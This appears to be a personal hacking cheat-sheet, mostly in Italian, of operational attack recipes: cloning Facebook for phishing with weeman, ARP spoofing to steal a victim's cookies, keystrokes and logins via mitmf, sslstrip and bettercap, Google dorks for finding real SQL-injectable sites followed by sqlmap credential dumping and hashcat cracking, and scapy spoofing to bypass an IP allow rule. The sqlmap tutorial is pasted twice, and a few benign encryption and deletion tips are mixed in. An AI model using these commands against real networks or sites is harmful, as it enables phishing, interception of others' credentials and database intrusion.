- Duplicare un sito per effettuare il phishing
https://github.com/evait-security/weeman
weeman > show
--------------------
url : none
port : 8080
action_url : none
user_agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
html_file : None
external_js : None
--------------------
weeman > set url http://www.facebook.com
weeman > set action_url 31.13.86.36
weeman > show
--------------------
url : http://www.facebook.com
port : 8080
action_url : 31.13.86.36
user_agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
html_file : None
external_js : None
--------------------
weeman > run
- Sniff cookies con arpspoof
installare
apt-get install ferret-sidejack
abilitare l’arpspoof e l’inoltro dei pacchetti ip_forward
# arpspoof -i wlan0 -t 192.168.1.1(gw) 192.168.1.3(vittima)
# arpspoof -i wlan0 -t 192.168.1.3(vittima) 192.168.1.1(gw)
# echo '1’ > /proc/sys/net/ipv4/ip_forward
# mitmf -i wlan0 —spoof —dns —hsts —gateway uprooter —target ipvittima
eseguire ferret:
# ferret -i wlan0
eseguire l’interfaccia grafica:
# hamster
collegarsi con un browser a: 127.0.0.1:1234
per vedere tutti i cookies intercettati e per collegarsi alle pagine visitate senza che venga richiesto il login.
- Sqlmap injection
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.
Google Dork string Column 1 Google Dork string Column 2 Google Dork string Column 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=
inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:historialeer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=
inurl:avd_start.php?avd= inurl:download.php?id=
inurl:event.php?id= inurl:main.php?id=
inurl:product-item.php?id= inurl:review.php?id=
inurl:sql.php?id= inurl:chappies.php?id=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=
inurl:galeri_info.php?l= inurl:website.php?id=
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ‘ at the end of the URL. (Just to ensure, ” is a double quotation mark and ‘ is a single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases
This commands reveals quite a few interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.
Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:
sqlmap injection
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.
Google Dork string Column 1 Google Dork string Column 2 Google Dork string Column 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=
inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:historialeer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=
inurl:avd_start.php?avd= inurl:download.php?id=
inurl:event.php?id= inurl:main.php?id=
inurl:product-item.php?id= inurl:review.php?id=
inurl:sql.php?id= inurl:chappies.php?id=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=
inurl:galeri_info.php?l= inurl:website.php?id=
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ‘ at the end of the URL. (Just to ensure, ” is a double quotation mark and ‘ is a single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases
This commands reveals quite a few interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.
Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target table user_login and user_password .
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
Step 7: Cracking password
So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?
Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
hash-identifier
Excellent. So this is DES(Unix) hash.
Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target table user_login and user_password .
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
Step 7: Cracking password
So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?
Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
hash-identifier
Excellent. So this is DES(Unix) hash.
Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
- Ottenere info di un dominio/ip
dimitry -winsepo output.txt dominio.com
Opure usare discover:
git clone https://github.com/leebaird/discover /opt/discover
cd /opt/discover
./update
./discover.sh
1 domain
1 passive
Company name
Domain name
Firefox /root/data/domain/index.html
- Effettuare scansioni di massa stile nmap
masscan -p80,8000-8100 10.0.1.0/24
- Keylogger and screenshot hack
n.b.: in caso di errori installare twisted versione 15.5.0
pip install Twisted==15.5.0
abilitare l’arpspoof e l’inoltro dei pacchetti ip_forward
# arpspoof -i wlan0 -t 192.168.1.1(gw) 192.168.1.3(vittima)
# arpspoof -i wlan0 -t 192.168.1.3(vittima) 192.168.1.1(gw)
# echo '1’ > /proc/sys/net/ipv4/ip_forward
avviare man in the middle framework con l’opzione —jskeylogger attiva per il key logger:
mitmf -i wlan0 —spoof —dns —jskeylogger —gateway iprouter —target ipvittima
avviare man in the middle framework con l’opzione —screen attiva per gli screenshot:
mitmf -i wlan0 —spoof —dns —screen —gateway iprouter —target ipvittima
in alternativa:
avviare man in the middle framework con l’opzione —arp:
mitmf -i wlan0 —spoof —dns —arp —jskeylogger —gateway iprouter —target ipvittima
- Hack ssl sslstrip
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.
It requires Python 2.5 or newer, along with the 'twisted' python module.
Installing:
pip install sslstrip
Running:
sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the
command-line options.
The four steps to getting this working (assuming you're running Linux)
are:
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
3) Run sslstrip with the command-line options you'd like (see above).
4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
arpspoof -i <yourNetworkdDevice> -t <theRoutersIpAddress> <yourTarget>
More Info: http://www.thoughtcrime.org/software/sslstrip/
- Arpspoof sslstip bettercap mitmf
Posso usare bettercap al posto di sslstrip con il comando:
bettercap —proxy -P POST ipvittima
Con questo comando sniffo solamente le richieste post della vittima
per sniffare tutto il traffico:
bettercap -X
si può usare anche il framework mitmf
apt-get install mitmf
e poi effettuare i comandi:
mitmf -i wlan0 —spoof —arp —dns —gateway iprouter —target ipvittima
con nmap effettuare una scansione della rete per vedere tutti gli host attivi:
nmap -sn -PR 192.168.1.0/24
oppure con:
nmap -sP 192.168.1.0/24
In alternativa ad nmap si può usare il comando netdiscover.
abilitare l’IP Forwarding sulla nostra macchina (io uso una backtrack) in modo da poter reindirizzare i pacchetti che ci arrivano verso la giusta destinazione, altrimenti rimarrebbero fermi dopo esserci arrivati:
# echo '1’ > /proc/sys/net/ipv4/ip_forward
su Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
su BSD:
sysctl -w net.inet.ip.forwarding=1
Controllate che l’IP Forwarding sia attivo con:
# cat /proc/sys/net/ipv4/ip_forward
Che dovrebbe restituire 1 ad indicare che l’IP Forwarding è abilitato.
Dobbiamo ora avvelenare le tabelle ARP del router e della vittima. Apriamo un terminale e lanciamo (uno per scheda o terminale):
# arpspoof -i wlan0 -t 192.168.1.1(gw) 192.168.1.3(vittima)
questo comando molto spesso non serve, basta solamente il secondo e cioe':
# arpspoof -i wlan0 -t 192.168.1.3(vittima) 192.168.1.1(gw)
L’IP del router è solitamente qualcosa come 192.168.1.1 oppure 192.168.0.1, leggete sulle istruzioni del vostro router se non conoscete l’indirizzo o usate tool come netdiscover, per conoscere quello della macchina vittima basterà lanciare ipconfig (windows) o ifconfig (linux) sulla macchina virtuale e leggere l’IP associato (o, di nuovo, usare netdiscover). La mia macchina virtuale vittima ad esempio è in 192.168.1.3, la mia backtrack in 192.168.1.15, il mio router in 192.168.1.1, la mia scheda di rete è chiamata wlan0.
Vedrete un output che continua a ripetersi (non fermate il comando ovviamente!), leggendolo vedrete che è esattamente quello che stavamo dicendo prima, mandiamo delle risposte ARP dicendo al router che il MAC della vittima è il nostro (primo comando) e viceversa (secondo comando)!
Manca solo sslstrip. Indirizziamo il traffico HTTP verso sslstrip così che possa fare il suo lavoro ed avviamo il programma:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# python sslstrip.py
Aprite una nuova scheda o un nuovo terminale e lanciate ettercap:
# ettercap -Tqu -i wlan0
Lanciate ettercap -h se volete avere informazioni sulle opzioni che state passando.
Installiamo Wireshark e andiamo ad analizzare manualmente cosa succede sulla rete. Avviatelo, selezionate la vostra interfaccia di rete e cliccate su start. Alla voce “filter” mettete
ip.addr == ipvittima
and http.request.method == "POST"
Filtreremo così solo le richieste POST della macchina vittima. Fate login (ad esempio su Libero) dalla macchina vittima, tornate su Wireshark e andate su “Capture -> Stop”, dovreste avere un solo risultato, cliccateci e, nel riquadro in fondo, scorrete fino alla fine e vedrete qualcosa come “LOGINID=mitm_this_mail%40libero.it&PASSWORD=ThisIsMyPassword” che sono proprio le credenziali che ho inserito io! Per uno screen andate qui: http://tinypic.com/r/2lkqqlf/6
Ettercap non riconosca la coppia LOGINID/PASSWORD, dobbiamo quindi modificare i filtri. Niente di più semplice: aprite il file “/usr/local/share/ettercap/etter.fields” (per la BackTrack) e aggiungete “loginid” nella parte relativa agli “[USER]”, l’unico filtro mancante per Libero. Salvate il file, riavviate ettercap e riprovate a fare login su Libero
istruzioni per sslstrip2
Prima di tutto, assicuriamoci di avere il sistema in ordine, eseguendo un controllo sugli update
apt-get update
apt-get upgrade
Ora scarichiamo i due tool già citati, ovvero SSLStrip2 e Dns2Proxy, estraiamoli dai rispettivi archivi, e spostandoci nella cartella di sslstrip2 tramite terminale. Installiamolo digitando:
python setup.py install
Fatto questo, iniziamo ad abilitare l'Ip Forwarding e settare le varie direttive iptables per garantirne il funzionamento:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-port 8000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
Ora, può iniziare effettivamente l'attacco. Spostiamoci nella directory di dns2proxy e lanciamolo digitando:
python dns2proxy -i
E' necessario specificare l'interfaccia nel caso non sia quella di default, ovvero la eth0.
Quindi lanciamo anche sslstrip2 in ascolto sulla porta 8000:
sslstrip -l 8000 -a
Infine, utilizziamo arpspoof per intercettare i dati
arpspoof -i wlan0 -t ipvittima iprouter
Noterete sicuramente che l'attacco non sarà perfetto, infatti è probabile che qualche sito riesca lo stesso a mantenere la connessione sicura mentre altri siti causeranno un errore nel programma, che non riuscirà a collegarsi al DNS reale del sito. Comunque sia avendo un buon margine di successo ci potremo ritenere soddisfatti.
download
https://github.com/byt3bl33d3r/MITMf
- Criptare file con gpg o openssl
If you don't want to encrypt your files with a public/private key pair and use just symmetric encryption with a pass phrase instead, use the following command:
gpg --symmetric --cipher-algo aes256 files.tar.gz
You will be asked for your pass phrase. After that an encrypted file named files.tar.gz.gpg is created.
To decrypt use the command
gpg --decrypt files.tar.gz.gpg > files.tar.gz
For my part, I mainly use two methods:
First method: tar and openssl
Tar the directory
tar cvf backup.tar /path/to/folder
You can remove the [v] switch from the tar command to switch off the verbose mode.
Encrypt
openssl aes-128-cbc -salt -in backup.tar -out backup.tar.aes -k yourpassword
You can change aes-128-cbc to any other cipher method openssl supports (openssl --help).
Decrypt
openssl aes-128-cbc -d -salt -in backup.tar.aes -out backup.restored.tar
It will ask for the password.
- Decode rot13 command line
echo "Rkcybvg Fuvg" | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'
Risultato:
Exploit Shift
- Estrarre IP da file di testo
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' file.txt
- Secure file deletion linux srm
srm is a secure replacement for rm(1). Unlike the standard rm, it overwrites the data in the target files before unlinking them. This prevents command-line recovery of the data by examining the raw block device. It may also help frustrate physical examination of the disk, although it's unlikely that it can completely prevent that type of recovery. It is, essentially, a paper shredder for sensitive files.
http://srm.sourceforge.net/
- IP Spoofing con scapy e python
supponiamo di avere un server apache con la direttiva:
Allow from 192.168.149.135
il server ha ip: 192.168.149.1
il nostro ip e': 192.168.149.139
cambio il source ip address con iptables:
iptables -t nat -A POSTROUTING -d 192.168.149.1 -j SNAT --to-source 192.168.149.135
effettuo lo spoof del mac address:
# scapy
>>> e = Ether()
>>> e.show()
WARNING: Mac address to reach destination not found. Using broadcast.
###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ff
src= 00:25:11:ad:1a:42
type= LOOP
cerco il macaddress del server http:
# scapy
>>> arping('192.168.149.0/24')
supponiamo che il mac trovato del server http sia: 00:50:56:c0:00:08
>>> e.dst = '00:50:56:c0:00:08' (mac addres del server http)
>>> a = ARP()
>>> a.show()
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= 6
plen= 4
op= who-has
hwsrc= 00:25:11:ad:1a:42
psrc= 192.168.149.139
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0
>>> a.hwdst = '00:50:56:c0:00:08' (mac address server http)
>>> a.pdst = '192.168.149.1' (ip server http)
>>> a.psrc = '192.168.149.135' (ip con opermessi di accesso alle pagine sul server)
effettuo lo spoof del mac address:
>>> while 1 : sendp(e/a)
